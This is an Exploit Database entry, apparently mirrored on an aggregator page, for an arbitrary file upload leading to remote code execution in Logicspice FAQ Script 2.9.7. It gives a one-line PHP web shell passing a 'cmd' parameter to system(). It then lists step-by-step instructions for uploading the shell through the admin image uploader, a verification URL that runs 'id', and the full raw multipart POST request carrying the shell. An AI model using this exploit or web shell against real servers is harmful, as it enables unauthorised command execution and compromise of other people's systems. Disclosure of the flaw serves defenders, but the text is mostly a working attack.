Logicspice FAQ Script 2.9.7 – Remote Code Execution

• Exploit Database
• 15 阅读

• 作者： AkkuS
  日期： 2018-09-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45326/

• # Exploit Title: Logicspice FAQ Script 2.9.7 - Remote Code Execution
  # Dork: N/A
  # Date: 2018-09-03
  # Exploit Author: Özkan Mustafa Akkuş (AkkuS)
  # Vendor Homepage: https://www.logicspice.com/products/faq-script
  # Software Link: https://www.logicspice.com/app/webroot/files/document/phpmyfaq-2.9.7.zip
  # Version: 2.9.7
  # Category: Webapps
  # Tested on: Kali linux
  
  # Description : Logicspice FAQ Script 2.9.7 allows to upload arbitrary files which 
  # leads to a remote command execution on the remote server.
  
  # 1) Create a file with the below PHP code and save it as .php
  
  <?php $cmd=$_GET['cmd']; system($cmd); ?>
  
  # 2) Login to FAQ Script admin portal as priviliage user
  # 3) At the left hand side go to Manage FAQ --> List FAQ (http://domain/admin/faqs)
  # 4) Click at the Actions button of a current FAQ product --> Edit
  # 5) Click (Image) button on Content panel.
  # 6) Chose Upload section and browse your .php file.
  # 7) Finaly click "Send it to Server". Script will give you a link belong to
  # our php file.
  # 8) verift the exploit:
  # http://domain/webroot/files/uploadimages/e90a3_shell.php?cmd=id
  
  # The request:
  
  POST
  /admin/faqs/faqimages?CKEditor=faqs-answer&CKEditorFuncNum=1&langCode=en
  HTTP/1.1
  Host: server
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
  Firefox/52.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer:
  http://server/admin/faqs/edit/eine-frage-fuer-onkel-peter
  Cookie: __asc=3c88bfff1659e6148e6168c52d2;
  __auc=3c88bfff1659e6148e6168c52d2; _ga=GA1.2.696297698.1535960501;
  _gid=GA1.2.2097449566.1535960501; __zlcmid=oDhc8xpdUQvf8W;
  admin_username=logicspice; admin_password=faqscript_admin;
  CAKEPHP=omckos7rsug4u3e1k3uebi7ma5; PHPSESSID=be29d40p12q20gtpvlea8esp23
  Connection: keep-alive
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data;
  boundary=---------------------------1036720403269880351068202740
  Content-Length: 267
  -----------------------------1036720403269880351068202740
  Content-Disposition: form-data; name="upload"; filename="shell.php"
  Content-Type: application/x-php
  
  <?php $cmd=$_GET['cmd']; system($cmd); ?>
  -----------------------------1036720403269880351068202740--